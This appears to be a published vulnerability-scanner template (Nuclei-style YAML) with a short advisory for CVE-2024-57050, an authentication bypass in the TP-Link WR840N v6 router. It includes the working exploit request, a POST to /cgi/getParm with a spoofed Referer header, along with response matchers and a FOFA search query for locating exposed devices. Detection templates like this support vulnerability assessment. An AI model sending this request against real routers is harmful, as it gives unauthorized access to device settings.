A vulnerability in the TP-Link WR840N v6 router with firmware version 0.9.1 4.16 and earlier permits unauthorized individuals to bypass the authentication of some interfaces under the /cgi directory.When adding Referer- http-//tplinkwifi.net to the the request, it will be recognized as passing the authentication.
PoC代码[已公开]
id: CVE-2024-57050
info:
name: TP-LINK WR840N v6 up to 0.9.1 4.16 - Improper Authentication
author: DhiyaneshDK
severity: critical
description: |
A vulnerability in the TP-Link WR840N v6 router with firmware version 0.9.1 4.16 and earlier permits unauthorized individuals to bypass the authentication of some interfaces under the /cgi directory.When adding Referer- http-//tplinkwifi.net to the the request, it will be recognized as passing the authentication.
reference:
- https://github.com/Shuanunio/CVE_Requests/blob/main/TP-Link/WR840N%20v6/ACL%20bypass%20Vulnerability%20in%20TP-Link%20TL-WR840N.md
- https://nvd.nist.gov/vuln/detail/CVE-2024-57050
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-57050
cwe-id: CWE-287
epss-score: 0.00043
epss-percentile: 0.1187
metadata:
verified: true
max-request: 1
fofa-query: body="WR840N"
tags: cve,cve2024,tp-link,auth-bypass
http:
- raw:
- |
POST /cgi/getParm HTTP/1.1
Host: {{Hostname}}
Referer: http://tplinkwifi.net
matchers-condition: and
matchers:
- type: word
part: body
words:
- "$.ret=0;"
- "var "
condition: and
- type: word
part: content_type
words:
- "application/javascript"
- type: status
status:
- 200
# digest: 4a0a00473045022100ab59543446875ec4129aa8f57c7a6a0f204f8b67669067a357c0c086b79ad9ab02204f2de7b266b80d7e61726d083b38603a6193c409f0ea79337ecf207e80365285:922c64590222798bb761d5b6d8e72950